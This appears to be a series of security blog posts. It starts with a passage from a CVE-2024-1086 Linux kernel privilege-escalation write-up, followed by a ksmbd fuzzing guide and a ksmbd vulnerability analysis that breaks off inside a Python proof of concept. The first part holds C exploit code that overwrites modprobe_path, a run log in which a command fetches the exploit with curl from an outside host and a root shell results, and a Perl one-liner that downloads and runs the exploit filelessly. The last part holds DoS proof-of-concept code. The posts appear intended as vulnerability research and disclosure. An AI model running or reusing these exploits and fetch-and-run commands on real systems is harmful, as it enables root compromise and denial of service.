	int modprobe_script_fd = memfd_create("", MFD_CLOEXEC);
	int status_fd = memfd_create("", 0);

	// range = (k * j) * CONFIG_PHYSICAL_ALIGN
	// scan 512 pages (1 PTE worth) for kernel base each iteration
	for (int k=0; k < (CONFIG_PHYS_MEM / (CONFIG_PHYSICAL_ALIGN * 512)); k++)
	{
		// scan 1 page (instead of CONFIG_PHYSICAL_ALIGN) for kernel base each iteration
		for (unsigned long long j=0; j < 512; j++) 
		{
			// scan 40 * 0x200000 (2MiB) = 0x5000000 (80MiB) bytes from kernel base for modprobe path. if not found, just search for another kernel base
			for (int i=0; i < 40; i++) 
			{
				for (pid_t pid_guess=0; pid_guess < 65536; pid_guess++)
				{
					int status_cnt;
					char buf;

                    // ... (overwrite modprobe_path)

					// run custom modprobe file as root, by triggering it by executing file with unknown binfmt
					// if the PID is incorrect, nothing will happen
					modprobe_trigger_memfd();

					// indicates correct PID (and root shell). stops further bruteforcing
					status_cnt = read(status_fd, &buf, 1);
					if (status_cnt == 0)
						continue;

					printf("[+] successfully breached the mainframe as real-PID %u\n", pid_guess);

					return;
				}

				printf("[!] verified modprobe_path address does not work... CONFIG_STATIC_USERMODEHELPER enabled?\n");

				return;
			}
			
			printf("[-] failed to find correct modprobe_path: trying to find new kernel base...\n");
		}
	}

	printf("[!] failed to find kernel code segment... TLB flush fail?\n");
	return;
}

Codeblock 5.1.5.2: A part of the privesc_flh_bypass_no_time() exploit function written in C, where it triggers the modprobe_path mechanism.

5.1.6. Post-exploit stability

As a byproduct of our memory shenanigans, the pagetable pages for the exploit process are a tad unstable. Fortunately, this only becomes a problem when the process stops, so we can solve it by not making it stop. :^)

We do this using a simple sleep() call, which unfortunately makes the TTY of the user sleep as well, since the process is sleeping in the foreground. To circumvent this, we make the exploit spawn a child process which performs the actual exploit, and make the parent exit when it is sementically supposed to.

Additionally, we register a signal handler for the children for SIGINT which will handle (among others) keyboard interrupts. This causes our child process to sleep in the background. The parent is not affected, as the handler is set in the child process.

Notice that we cannot use wait() as the child processes will remain running in the background.

int main()
{
	int *exploit_status;

	exploit_status = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	*exploit_status = EXPLOIT_STAT_RUNNING;

	// detaches program and makes it sleep in background when succeeding or failing
	// - prevents kernel system instability when trying to free resources
	if (fork() == 0)
	{
		int shell_stdin_fd;
		int shell_stdout_fd;

		signal(SIGINT, signal_handler_sleep);

		// open copies of stdout etc which will not be redirected when stdout is redirected, but will be printed to user
		shell_stdin_fd = dup(STDIN_FILENO);
		shell_stdout_fd = dup(STDOUT_FILENO);

#if CONFIG_REDIRECT_LOG
		setup_log("exp.log");
#endif

		setup_env();
 
		privesc_flh_bypass_no_time(shell_stdin_fd, shell_stdout_fd);

		*exploit_status = EXPLOIT_STAT_FINISHED;

		// prevent crashes due to invalid pagetables
		sleep(9999);
	}

	// prevent premature exits
	SPINLOCK(*exploit_status == EXPLOIT_STAT_RUNNING);

	return 0;
}

Codeblock 5.1.6.1: A part of the main() exploit function written in C, which sets up the child processes and waits until the exploit is done.

5.1.7. Running it

For KernelCTF, I ran the exploit using cd /tmp && curl https://secret.pwning.tech/ -o ./exploit && chmod +x ./exploit && ./exploit. This takes advantage of the writable /tmp directory on the target machine. This was before I realized I could presumably execute the exploit filelessly with Perl. Finally, after months of work, we are rewarded with:

user@lts-6:/$ id
uid=1000(user) gid=1000(user) groups=1000(user)

user@lts-6:/$ curl https://cno.pwning.tech/aaaabbbb-cccc-dddd-eeee-ffffgggghhhh -o /tmp/exploit && cd /tmp && chmod +x exploit && ./exploit
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  161k  100  161k    0     0   823k      0 --:--:-- --:--:-- --:--:--  823k

[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[*] waiting for the calm before the storm...
[*] sending double free buffer packet...
[*] spraying 16000 pte's...
[   13.592791] ------------[ cut here ]------------
[   13.594923] WARNING: CPU: 0 PID: 229 at mm/slab_common.c:985 free_large_kmalloc+0x3c/0x60
...
[   13.746361] ---[ end trace 0000000000000000 ]---
[   13.748375] object pointer: 0x000000003d8afe8c
[*] checking 16000 sprayed pte's for overlap...
[+] confirmed double alloc PMD/PTE
[+] found possible physical kernel base: 0000000014000000
[+] verified modprobe_path/usermodehelper_path: 0000000016877600 ('/sanitycheck')...
[*] overwriting path with PIDs in range 0->4194304...
[   14.409252] process 'exploit' launched '/dev/fd/13' with NULL argv: empty string added
/bin/sh: 0: can't access tty; job control turned off
root@lts-6:/# id
uid=0(root) gid=0(root) groups=0(root)

root@lts-6:/# cat /flag
kernelCTF{v1:mitigation-v3-6.1.55:1705665799:...}

root@lts-6:/#

Codeblock 5.1.7.1: An exploit log for an exploitation attempt on the KernelCTF, leading to a root shell.

Practically speaking, the user could copy/paste the PID from the kernel warning into the exploit stdin when working with KernelCTF remote instances, but I wanted to bruteforce PIDs so my exploit works on other infrastructure as well.

The exploit supports fileless execution when the target has perl installed. This is nice when the target filesystem is read-only. It works by setting modprobe_path to /proc//fd/ among other things.

perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  open(my $fh, ">&=".$fd);
  print $fh `curl https://example.com/exploit -s`;
  exec {"/proc/$$/fd/$fd"} "memfd";
'

Codeblock 5.1.7.2: An exploit bootstrap script in Perl, which executes the exploit without writing to disk (fileless-execution).

5.2. Source code

The exploit source code can be found in my CVE-2024-1086 PoC repository. As with all of my software projects, I tried to focus on developer experience as well. Hence, the exploit source code has been split across several files for the separation of concerns, and only the functions which should be called in other files are exported (put inside of the .h file) whilst all other functions are marked static. This is much like the public/private attributes of OOP languages.

Additionally, I decided to make the exploit crash/exit instead of properly returning errors when an error occurs. I do this since there is no added value in returning error codes, as its purpose is being a stand-alone binary and not a library. Hence, if one decides for whatever reason to embed these functions into a library, they should semantically speaking make the functions return error codes instead.

If I'm missing any important semantics, feel free to send me a DM (using contact details at the bottom of this blogpost).

5.3 Compiling the exploit

5.3.1. Dependencies

The exploit has 2 dependencies: libnftnl-dev and libmnl-dev. Libmnl parses and constructs netlink headers, whilst libnftnl presumably constructs netfilter-like objects for the user such as chains and tables, and serializes them to netlink messages for libmnl. This is a powerful combination which allows the user to do pretty much anything required for the exploit.

Regretfully, I had to do a bit of tweaking for the exploit. In the exploit repository, have added an .a (ar archive) file for the libraries compiled with musl-gcc, which is essentially an .zip for object files which the compilers understand. This allows for statically linking the libraries with musl-gcc. I had to download a seperate libmnl-dev version, but this is listed in a section below. Fortunately enough for the end-user, this means they do not have to install the libraries seperately.

5.3.2. Makefile

To statically compile the exploit for KernelCTF, I used the following makefile:

SRC_FILES := src/main.c src/env.c src/net.c src/nftnl.c src/file.c
OUT_NAME = ./exploit

# use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu
#   and dynamically linking raised glibc ABI versioning errors
CC = musl-gcc

# use custom headers with fixed versions in a musl-gcc compatible manner
# - ./include/libmnl: libmnl v1.0.5
# - ./include/libnftnl: libnftnl v1.2.6
# - ./include/linux-lts-6.1.72: linux v6.1.72
CFLAGS = -I./include -I./include/linux-lts-6.1.72 -Wall -Wno-deprecated-declarations

# use custom object archives compiled with musl-gcc for compatibility. normal ones 
#   are used with gcc and have _chk funcs which musl doesn't support
# the versions are the same as the headers above
LIBMNL_PATH = ./lib/libmnl.a
LIBNFTNL_PATH = ./lib/libnftnl.a

exploit: _compile_static _strip_bin
clean:
	rm $(OUT_NAME)


_compile_static:
	$(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH)
_strip_bin:
	strip $(OUT_NAME)

Codeblock 5.3.2.1: The Makefile used to statically compile the exploit.

5.3.3. Static compilation remarks & errors

This section is just for troubleshooting people who try to static-compile their own exploits.

5.3.3.1. Libmnl not found

One of the issues when living the easy life with apt and compiling with gcc, was that libmnl-dev - one of the libraries containing the netlink functions - in the Debian stable repository has an invalid .a file at the time of writing this. When trying to compile statically, this will look like:

/usr/bin/ld: cannot find -lmnl: No such file or directory 
collect2: error: ld returned 1 exit status 
make: *** [Makefile:17: _compile_static] Error 1

Codeblock 5.3.3.1.1: Shell stderr output containing an linking error about being unable to resolve libmnl.

To fix this, please install the libmnl package which is currently in the unstable repository: sudo apt install libmnl-dev/sid (*/sid installs the package from the Debian unstable repo).

Otherwise, just clone the libmnl repository and compile the library yourself with gcc, and create the .a file yourself.

5.3.3.2. Invalid opcodes - AVX fun

The last issue I experienced when compiling the exploit statically using gcc with glibc, was the use of unsupported instructions - specifically unsupported AVX(512) instructions, observed by opening the binary in Ghidra and looking at the RIP address. The x86 extension AVX512 includes instructions for usage of bigger registers supported by server CPUs. Usually gcc uses the architecture and supported instructions of the CPU it is running on to poll its support for instructions, i.e. using CPUID. However, I was compiling the exploit in a QEMU VM with the -cpu host argument set, on my Intel Xeon CPU which has support for AVX512.

The issue is that QEMU - at least in that version - does not support AVX512 extensions. So 50% of the time the exploit would raise a CPU trap in QEMU due to unsupported opcodes (instructions). The reason these instructions were executed is yet another rabbit hole.

[   15.211423] traps: exploit[167] trap invalid opcode ip:433db9 sp:7ffcb0682ee8 error:0 in exploit[401000+92000]

Codeblock 5.3.3.2.1: Dmesg output containing an invalid opcode error (CPU trap).

I solved this by simply removing the -cpu host argument of the QEMU VM and compiling the exploit in that VM as it would use the actual CPU properties that QEMU supports, and hence gcc would no longer use AVX512 considering CPUID does not spoof AVX512 support.

Sadly enough, the KernelCTF instances always have the -cpu host argument enabled. Fortunately, the KernelCTF community told me I needed to statically compile the exploit with musl-gcc instead, since glibc is not made for static compilation.

6. Discussion

6.1. The double-free methods

In the blogpost, I present 2 methods to allocate an order==0 page and order==4 page to the same address: draining the PCP lists, and the race condition. The former made the latter obsolete because it is not depending on a race condition.

The race condition method only works properly for VMs with emulated serial TTYs (i.e. not virtio-serial), because the race condition window is too small on physical systems (~1ms instead of 50ms-300ms). Fortunately enough, this delay was 300ms for KernelCTF and hence allowed me to use this method.

I was not satisfied with the quality and stability of this method, so I refined the exploit for longer than a month, and (among other improvements) came up with the 2nd method: draining the PCP list to allocate pages from the buddy-allocator.

When I started writing the exploit, I was not familiar with the internals of the buddy-allocator and the PCP-allocator. Only after investigating the internals of the allocators I understand how I could properly abuse it for the exploit. Hence, one of the biggest lessons I have internalized is fully understanding something before trying to abuse it, because it will always have advantages.

6.2. Post-exploitation stability

Because the proof-of-concept exploit in this blogpost is utilizing a sk_buff double-free, and has to deal with corrupted skb's, we have to deal with noise in the freelist when network activity happens. When a packet is transmitted or received, an skb's will be allocated from and deallocated to the freelist. Currently, we try to minimize this by disabling stdout around double-free time, which helps when the exploit is running over SSH or a reverse shell.

However, on some hardware systems (like Debian in the hardware setup table), it seems the exploit still manages to crash the system after a few seconds. I have not looked into this, but I suspect this may be because the hardware-based test devices are laptops, and therefore have WiFi adapters. Because WiFi frames (which may not even be targetted to the devices) are also skb's, an WiFi connected device on a high-usage WiFi network (such as the test devices) may be unstable. When the WiFi adapter is disabled in BIOS, the exploit runs fine, which supports this theory.

If a researcher wants to increase the stability of the exploit post-exploitation, they would probably want to either manipulate the SLUB allocator to make the corrupted skb unavailable, or use Dirty Pagedirectory to fix this matter.

7. Mindset & Signing Off

7.1. VR mindset

While tackling this project, I focused on three key objectives: ensuring broad compatibility, resilient stability, and covert execution. In essence, it culminated in a highly-capable kernel privilege-escalation exploit. Additionally, I tried to keep the codebase as elegant as possible, utilizing my software engineering background.

This meant that on top of the 2-month development period, there were 2 months for refining the exploit for high stability and compatibility. I decided to take this path since I wanted to demonstrate my technical capabilities in this blogpost (and to challenge myself).

This meant thinking differently: I needed to abuse intended, data-only behaviour in subsystems which would be broadly available. This is reflected in the exploit techniques, because I only make use of the IPv4 subsystem and virtual memory, which are enabled on nearly all kernel builds. In fact, most work for the exploit was put into hitting specific codepaths (e.g. the packet being sent from 1.1.1.1 to 255.255.255.255) and making it elegant.

Additionally, I'm not exploiting any slab-allocator behaviour for the exploit itself: just for masking sk_buff objects, and initial kmalloc/kfree calls which are passed down to the page allocators. Because of this, the exploit is not affected by slab-allocator behaviour which tends to change across versions due to new mitigations like random kmalloc caches. Unfortunately, the initial bug requires unprivileged user namespaces and nftables. The other techniques - like Dirty Pagedirectory and PCP draining - should work regardless of this, and hence can be used for real-world exploits

7.2. Reflection

I had great fun researching the bug and exploitation techniques, and was really invested in making the exploit work. Never had I ever gotten so much joy developing a project, specifically when dropping the first root shell with the bug. Additionally, I have learned a great deal about the networking subsystem of the Linux kernel (from nftables to IP fragmentation to IP handling code) and the memory management subsystem (from allocators to pagetables).

Of all my experiences in the IT field - ranging from software engineering to network engineering to security engineering - this was by far the most joyful project, and it gave me one of the biggest challenges I have encountered yet.

Additionally, it gave me inspiration for other projects which I want to develop and publish to contribute to the community. But until they are ready to be revealed to the world, they shall remain in the dark. :^)

7.3. Credits

I'd like to thank the following people for contributing to the blogpost in various ways:

@ky1ebot (Twitter/X): extensive peer-review.
@daanbreur (Github): assistance with diagram colorscheme.

Additionally, I tried to link every blogpost/article/etc I utilized in the relevant sections. If you believe I reused your technique without credits, please reach out to me, and I will link your blogpost in the relevant section.

7.4. Signing off

Thank you for reading, it's been an honor to present this article.

For professional inquiries, please contact notselwyn@pwning.tech (PGP key) as I would love to discuss options and ideas. For other shenanigans, please don't be afraid to slide into my Twitter DMs over at @notselwyn.

Notselwyn‌‌
March 2024

Tickling ksmbd: fuzzing SMB in the Linux kernel

notselwyn — Sat, 16 Sep 2023 13:48:24 GMT

This blogpost is the next installment of my series of hands-on no-boilerplate vulnerability research blogposts, intended for time-travelers in the future who want to do Linux kernel vulnerability research for bugs. In this blogpost I'm discussing adding psuedo-syscalls and struct definitions for ksmbd to Syzkaller, setting up an working ksmbd instance, and patching ksmbd in order to collect KCOV. Let's dive in!

1. What are Syzkaller and KCOV?

Syzkaller is an unsupervised coverage-guided kernel fuzzer, or put differently: it throws generated input at a kernel (through system calls, network packets, et cetera) based on educated-guesses in order to find bugs in that kernel. Syzkaller has builtin support for several kernels, such as Windows, Linux and OpenBSD. A full list can be found in Syzkaller's Github repository.

Syzkaller partially bases its prioritization on KCOV (kernel coverage) since it assumes that more coverage = more bugs. For a full explanation of Syzkaller and KCOV please refer to the "Collecting network coverage — KCOV" and "Integrating into syzkaller" sections of the "Looking for Remote Code Execution bugs in the Linux kernel" blogpost by Xairy.io in order to deduplicate content and keep this blogpost as technical as possible.

2. Adding Syzkaller definitions for ksmbd

In order to make Syzkaller generate input in an efficient matter, we need to give it the structure of the input. For ksmbd, those inputs are SMB requests and hence we need to provide Syzkaller with the structures for SMB requests. The file with my unauthenticated ksmbd definitions can be found here: ksmbd.txt.

The syntax for declaring Syzkaller structures and psuedo-syscalls is quite straightforward and well documented in their Github repository. For ksmbd, you can just copy ksmbd.txt to sys/linux/ksmbd.txt in the Syzkaller repository and Syzkaller will automatically index it. When defining Syzkaller structures you should be as tightly emulating the real data as possible. Hence, please note that the structures are marked as [packed], which means that Syzkaller should not add any padding to the structure, as that will ruin the validity of the SMB request.

However, defining Syzkaller psuedo-syscalls is not as well documented. In order to define your own psuedo-syscalls, you need to define the functions in executor/common_linux.h in the Syzkaller repository. The code I added for sending the requests is (with explanation below):

#if SYZ_EXECUTOR || __NR_syz_ksmbd_send_req
#include 
#include 
#include 
#include 
#include 

#define KSMBD_BUF_SIZE 16000

static long syz_ksmbd_send_req(volatile long a0, volatile long a1, volatile long a2, volatile long a3)
{
	int sockfd;
	int packet_reqlen;
	int errno;
	struct sockaddr_in serv_addr;
	char packet_req[KSMBD_BUF_SIZE]; // max frame size

	debug("[*]{syz_ksmbd_send_req} entered ksmbd send...\n");

	if (a0 == 0 || a1 == 0) {
		debug("[!]{syz_ksmbd_send_req} param empty\n");
		return -7;
	}

	sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sockfd < 0) {
		debug("[!]{syz_ksmbd_send_req} failed to create socket\n");
		return -1;
	}

	memset(&serv_addr, '\0', sizeof(serv_addr));
	serv_addr.sin_family = AF_INET;
	serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	serv_addr.sin_port = htons(445);

	errno = connect(sockfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
	if (errno < 0) {
		debug("[!]{syz_ksmbd_send_req} failed to connect (err: %d)\n", errno);
		return errno ^ 0xff80000;
	}

	// prepend kcov handle to packet
	packet_reqlen = a1 + 8 > KSMBD_BUF_SIZE ? KSMBD_BUF_SIZE - 8 : a1;
	*(unsigned long*)packet_req = procid + 1;
	memcpy(packet_req + 8, (char*)a0, packet_reqlen);

	if (write(sockfd, (char*)packet_req, packet_reqlen + 8) < 0)
		return -4;

	if (read(sockfd, (char*)a2, a3) < 0)
		return -5;

	if (close(sockfd) < 0)
		return -6;

	debug("[+]{syz_ksmbd_send_req} successfully returned\n");

	return 0;
}
#endif

C source-code for syz_ksmbd_send_req: a custom psuedo-syscall

The function prepends the process ID of the currently running syz-executor to a TCP packet, sends the TCP packet (like an SMB request) to 127.0.0.1:445 and receives a TCP packet (like an SMB response). Prepending the process ID to the packet has todo with kcov and will be explained in section 4.

The psuedo-syscall can be exclusively whitelisted using the following value in the Syzkaller config (the full config can be found in section 5):

}
	// ...
	"enable_syscalls": [
		"syz_ksmbd_send_req"
	],
	// ...
}

A snippet of the "enable_syscalls" key in the Syzkaller config

3. Setting up ksmbd

In order to interact with ksmbd, we need to send SMB packets to at 127.0.0.1:445. However when we the executor tries it, it will not able to reach it due to two reasons:

Ksmbd needs to be started from userland
Networking namespaces prevent access

In order to start the ksmbd TCP server in the kernel we need to kickstart it using the userland toolset. Specifically, we need to setup an SMB user in order to start the SMB server and run the command to start the ksmbd server. In order to be able to interact with ksmbd in Syzkaller VMs, we need to run those commands in every VM at boot-time. I solved this by creating an systemctl service, which runs a script that kickstarts ksmbd.

[Unit]
Description=Ksmbd
After=network.target
StartLimitIntervalSec=0
Type=simple
Restart=always
RestartSec=1

[Service]
User=root
Group=root
ExecStart=/root/start_ksmbd.sh

[Install]
WantedBy=multi-user.target

/etc/systemd/system/ksmbd.service: a TOML file containing a description of an systemctl service

#!/usr/bin/env bash

ksmbd.addshare --add-share=files --options="path = /tmp 
read only = no"
ksmbd.adduser -a user -p password
ksmbd.mountd -n

/root/start_ksmbd.sh: a simple shell script that kickstarts ksmbd by running several commands

After enabling the service, it should be possible to connect to ksmbd using nc 127.0.0.1 445 -v.

Lastly, Syzkaller enables networking namespaces by default. The ksmbd service only works on 127.0.0.1:445 in the root-namespace, so the syz-executor instances will not be able to connect to ksmbd since they run in their own namespaces. To bypass this feature, I patched the Syzkaller source-code to avoid creating a network namespace:

static int do_sandbox_none(void)
{
    // [snip]
#if SYZ_EXECUTOR || SYZ_NET_DEVICES
    initialize_netdevices_init();
#endif
+   /*
    if (unshare(CLONE_NEWNET)) {
        debug("unshare(CLONE_NEWNET): %d\n", errno);
    }
+   */
    // Enable access to IPPROTO_ICMP sockets, must be done after CLONE_NEWNET.
    write_file("/proc/sys/net/ipv4/ping_group_range", "0 65535");
+   /*
#if SYZ_EXECUTOR || SYZ_DEVLINK_PCI
    initialize_devlink_pci();
#endif
    // [snip]
#if SYZ_EXECUTOR || SYZ_NET_DEVICES
    initialize_netdevices();
#endif
+   */
#if SYZ_EXECUTOR || SYZ_WIFI
    initialize_wifi_devices();
#endif
    setup_binderfs();

+   /*
    int netns = open("/proc/1/ns/net", O_RDONLY);
    // [snip]
    close(netns);
+   */

    loop();
    doexit(1);
}
#endif

Now, the syz-executor instances run in the (same) root-namespace which means that the ksmbd service is available at 127.0.0.1:445 for syz-executor instances.

4. Adding KCOV support to ksmbd

When we try to fuzz ksmbd using the Syzkaller setup demonstrated above in section 2 and section 3 we will notice that the Syzkaller coverage page will not show any coverage in ksmbd, even though it gets valid SMB response. The result of that is that Syzkaller will not generate input based on the amount of ksmbd code reached and the compared request values. We do not get any KCOV because the execution flow of sending our SMB request starts at sys_send() and passes through the networking stack, where soft interrupt requests (softirq's) handles sending and receiving the packet. Because interrupt contexts do not have a process context assigned, they do not support KCOV and stop coverage tracking. Therefore, we need to either:

Patch the networking subsystem to not use softirq's
Patch ksmbd to use remote KCOV

I started out trying to patch the networking subsystem because I did not know about remote KCOV, but I ended up giving up due to the complexity of the networking subsystem. Hence, that left me exploring the web for alternatives: enter remote KCOV.

Remote KCOV allows you to (re)start KCOV using an identifier which the KCOV collector (like syz-fuzzer) uses to assign certain KCOV to a certain process (like syz-executor). Specifically, syz-fuzzer user the syz-executor instance PID as KCOV identifier, so we need to pass our process id to ksmbd per connection. Luckily, we can prepend the PID to our SMB packet in syz-executor without ugly side effects due to the way ksmbd works with sockets: we can execute an simple read(sock_fd, &pid, 8) function call at the start of the TCP connection handler to acquire the process id in ksmbd. The codeblocks below contain patches for starting remote KCOV (explanation below):

struct ksmbd_conn {
    // [snip]

+   unsigned long         kcov_handle;
};

C source-code containing a patch for the struct ksmbd_conn

int ksmbd_conn_handler_loop(void *p)
{
    struct ksmbd_conn *conn = (struct ksmbd_conn *)p;
    struct ksmbd_transport *t = conn->transport;
    unsigned int pdu_size, max_allowed_pdu_size;
    char hdr_buf[4] = {0,};
    int size;

    // [snip]

    if (t->ops->prepare && t->ops->prepare(t))
        goto out;

+   size = t->ops->read(t, (char*)&conn->kcov_handle, sizeof(conn->kcov_handle), -1);
+   if (size != sizeof(conn->kcov_handle))
+       goto out;
+
+   kcov_remote_start(conn->kcov_handle);

    conn->last_active = jiffies;
    while (ksmbd_conn_alive(conn)) {
        // [snip]
    }

+   kcov_remote_stop();

out:
    // [snip]
    return 0;
}

C source-code containing a patch for the function ksmbd_conn_handler_loop()

static void handle_ksmbd_work(struct work_struct *wk)
{
    struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
    struct ksmbd_conn *conn = work->conn;

+   kcov_remote_start(conn->kcov_handle);
    atomic64_inc(&conn->stats.request_served);
    
    __handle_ksmbd_work(work, conn);

    // [snip]

+   kcov_remote_stop();
}

C source-code containing a patch for the function handle_ksmbd_work()

As you can see, we add the kcov_handle property to struct ksmbd_conn to keep track of the KCOV identifier throughout the process of handling an SMB request. Secondly, when an TCP connection gets accepted (and ksmbd_conn_handler_loop gets called) we instantly read the first 8 bytes to kcov_handle, after which the rest of the code will not notice anything with regards to the prepended data. However, ksmbd_conn_handler_loop itself will defer SMB requests within the TCP session so we lose KCOV yet again. Hence, we need to start KCOV again in handle_ksmbd_work which is called for each SMB-request related TCP packet. Luckily, we saved the kcov_handle in struct ksmbd_conn so we can easily access it to restart KCOV.

5. Testing it

We can recompile syzkaller using:

make generate -j`nproc`  # generate headers containing our psuedo-syscall
make -j`nproc`  # build binaries

Linux shell commands

The config I used for fuzzing (it should be ironed out per system):

{
	"target": "linux/amd64",
	"http": "0.0.0.0:56741",
	"workdir": "workdir",
	"kernel_obj": "./linux-v6.4-patched",
	"image": "./image/bullseye.img",
	"sshkey": "./image/bullseye.id_rsa",
	"syzkaller": "/opt/syzkaller",
	"procs": 16,
	"type": "qemu",
	"sandbox": "none",
	"enable_syscalls": [
		"syz_ksmbd_send_req"
	],
	"vm": {
		"count": 24,
		"kernel": "./linux-v6.4-patched/arch/x86/boot/bzImage",
		"cpu": 1,
		"cmdline": "net.ifnames=0 oops=panic panic_on_warn=1 panic_on_oops=1",
		"mem": 2048
	}
}

A json datastructure containing configuration values for Syzkaller

When testing the Syzkaller and ksmbd setups demonstrated above, everything should run smoothly without any nasty errors or bugs. While using Syzkaller with the config above I found 4 unique bugs in an Linux 6.4 release:

The Syzkaller dashboard containing 4 unique bugs (3 times out-of-bounds read and 1 use-after-free write)

6. Conclusion

I'm satisfied with how the fuzzer turned out as it allows me to fuzz unauthenticated SMB requests, but there's still a long way to go to improve the QoL of (ksmbd) fuzzing:

Extending the SMB request definitions to support more commands
Implementing authentication using a psuedo-syscall that returns the session id

Thank you for reading my blogpost, I hope you learned as much as I did researching and writing about these topics. For questions, job inquiries, and other things, please send an email to notselwyn@pwning.tech (PGP key).

Unleashing ksmbd: crafting remote exploits of the Linux kernel

notselwyn — Fri, 04 Aug 2023 18:57:34 GMT

December 22nd 2022: it's Christmas Thursday, one of the last workdays before the Christmas vacation starts. Whilst everyone was looking forward to opening presents from friends and family, the Zero Day Initiative decided to give the IT community a present as well: immense stress in the form of ZDI-22-1690, an unauthenticated RCE vulnerability in the Linux kernel's ksmbd subsystem.

This vulnerability showed me the way to a buggy subsystem of the Linux kernel: ksmbd. Ksmbd stands for Kernel SMB Daemon which acts as an SMB server (which you may recognize from Windows) in the kernel. SMB is known in the community for the unnecessary complexity and it's resulting vulnerabilities. Imagine the reaction of the Linux developer community when ksmbd was being introduced in the kernel.

I wanted to learn more about SMB and the ksmbd subsystem so I decided to do vulnerability research in this subsystem, with results. In this write-up I will present the exploits and technical analyses behind ZDI-23-979 and ZDI-23-980: network-based unauthenticated Denial-of-Service and network-based (un)authenticated Out-of-Bounds read 64KiB.

An overview of SMB

Server Message Block is a file transfer protocol widely used by Windows OS where it can be used to access a NAS or another computer over a network. The most important features of SMB are file reads and writes, accessing directory information and doing authentication. Since the Windows OS tries to integrate SMB, SMB also has many ways of doing authentication for the Windows ecosystem: NTLMSSP, Kerberos 5, Microsoft Kerberos 5, and Kerberos 5 user-to-user (U2U). Ofcourse, the kernel also supports normal authentication like regular passwords.

To prevent extensive resource usage (like disk storage and RAM), SMB has a credit system where each command subtracts credits from the session. If the credits reach 0, the session cannot issue more commands.

N.B. A packet, request and command are different things. The same goes for a session and a connection.

An overview of the definitions of an chained SMB request packet.

An overview of the definitions of an SMB session and connection.

ZDI-23-979: NULL Pointer Dereference Denial-of-Service

ZDI-23-979 is an network-based unauthenticated NULL pointer dereference vulnerability resulting from a logic bug in the session handling of chained SMB request packets. The ksmbd subsystem only handles the session for the first request in the packet, which makes a second request in the packet use the same session instance as well. However, when the first request does not use a session, the second request does consequently not use a session either, even when it is required.

This could hypothetically result in an auth bypass since it skips the session/auth checks, but instead leads to an NULL pointer dereference since it tries to access properties of the request session.

Let's dive in the function __handle_ksmbd_workof v6.3.9, the last vulnerable kernel release. This function gets called for every packet from a connection. As you can see, the function does call __process_request for every request in the packet, but only checks the session for the first request in the packet using conn->ops->check_user_session(work) (explanation below).

static void __handle_ksmbd_work(struct ksmbd_work *work,
				struct ksmbd_conn *conn)
{
	u16 command = 0;
	int rc;

	// [snip] (initialize buffers) 

	if (conn->ops->check_user_session) {
		rc = conn->ops->check_user_session(work);

		// if rc != 0 goto send (auth failed)
		if (rc < 0) {
			command = conn->ops->get_cmd_val(work);
			conn->ops->set_rsp_status(work,
					STATUS_USER_SESSION_DELETED);
			goto send;
		} else if (rc > 0) {
			rc = conn->ops->get_ksmbd_tcon(work);
			if (rc < 0) {
				conn->ops->set_rsp_status(work,
					STATUS_NETWORK_NAME_DELETED);
				goto send;
			}
		}
	}

	do {
		rc = __process_request(work, conn, &command);
		if (rc == SERVER_HANDLER_ABORT)
			break;

	    // [snip] (set SMB credits)
	} while (is_chained_smb2_message(work));

	if (work->send_no_response)
		return;

send:
	// [snip] (send response)
}

__handle_ksmbd_work - session handling and request processing per packet.

The function conn->ops->check_user_session(work) checks if the pending request requires a session, and if it does it will check req_hdr->SessionId for existing sessions whereby req_hdr->SessionId is randomly generated during SMB login. If the session check succeeds, then work->sess = ksmbd_session_lookup_all(conn, sess_id) or if the request does not require a session, then work->sess = NULL.

int smb2_check_user_session(struct ksmbd_work *work)
{
	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
	struct ksmbd_conn *conn = work->conn;
	unsigned int cmd = conn->ops->get_cmd_val(work);
	unsigned long long sess_id;

	/*
	 * SMB2_ECHO, SMB2_NEGOTIATE, SMB2_SESSION_SETUP command do not
	 * require a session id, so no need to validate user session's for
	 * these commands.
	 */
	if (cmd == SMB2_ECHO_HE || cmd == SMB2_NEGOTIATE_HE ||
	    cmd == SMB2_SESSION_SETUP_HE)
		return 0;

	// [snip] (check conn quality)

	sess_id = le64_to_cpu(req_hdr->SessionId);

	// [snip] (chained request logic that was unused)

	/* Check for validity of user session */
	work->sess = ksmbd_session_lookup_all(conn, sess_id);
	if (work->sess)
		return 1;
	
    // [snip] (invalid session handling)
}

smb2_check_user_session - codeblock of SMB validation checks.

Obviously, when the first command is i.e. SMB2_ECHO_HE and the second command is i.e. SMB2_WRITE, the work->sess variable will be NULL in smb2_write(). This will cause a dereference like work->sess->x and hence a NULL pointer derefence. Since NULL pointer dereferences panic the kernel thread, the SMB server will be taken offline while the rest of the kernel remains online. The proof-of-concept exploit for this vulnerability is as follows:

#!/usr/bin/env python3

from impacket import smb3, nmb
from pwn import p64, p32, p16, p8


def main():
    print("[*] connecting to SMB server (no login)...")

    try:
        conn = smb3.SMB3("127.0.0.1", "127.0.0.1", sess_port=445, timeout=3)
    except nmb.NetBIOSTimeout:
        print("[!] SMB server is already offline (connection timeout)")
        return

    # generate innocent SMB_ECHO request
    request_echo = smb3.SMB3Packet()
    request_echo['Command'] = smb3.SMB2_ECHO
    request_echo["Data"] = p16(4) + p16(0)
    request_echo["NextCommand"] = 64+4  # set NextCommand to indicate request chaining

    # generate innocent SMB_WRITE request
    request_write = smb3.SMB3Packet()
    request_write['Command'] = smb3.SMB2_WRITE
    request_write["Data"] = p16(49) + p16(0) + p32(0) + p64(0) + p64(0) + p64(0) + p32(0) + p32(0) + p16(0) + p16(0) + p32(0) + p8(0)
